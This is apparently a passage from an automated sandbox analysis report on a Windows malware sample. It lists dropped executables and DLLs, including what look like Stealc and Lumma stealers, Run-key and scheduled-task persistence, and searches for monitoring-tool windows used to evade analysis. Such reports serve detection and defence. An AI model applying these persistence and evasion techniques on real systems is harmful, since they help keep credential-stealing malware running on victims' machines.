                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeFile created: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000356001\neon.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeFile created: C:\ProgramData\EBook JS Plugin 9.26.47\EBook JS Plugin 9.26.47.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\Qt5OpenGL.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\LummaC222222[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\rstxdhuj[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\needmoney[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\12dsvc[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\ssleay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\neon[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stories[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exeFile created: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_shfoldr.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\libeay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cccc2[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_iscrypt.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeFile created: C:\Users\user\AppData\Local\Temp\svchost015.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\crypted[1].exeJump to dropped file
                                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\is-0DA5B.tmpJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpFile created: C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeFile created: C:\ProgramData\EBook JS Plugin 9.26.47\EBook JS Plugin 9.26.47.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                                  Boot Survival

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c9a37ab27e.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2a8f2f9086.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
                                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c9a37ab27e.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c9a37ab27e.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2a8f2f9086.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2a8f2f9086.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
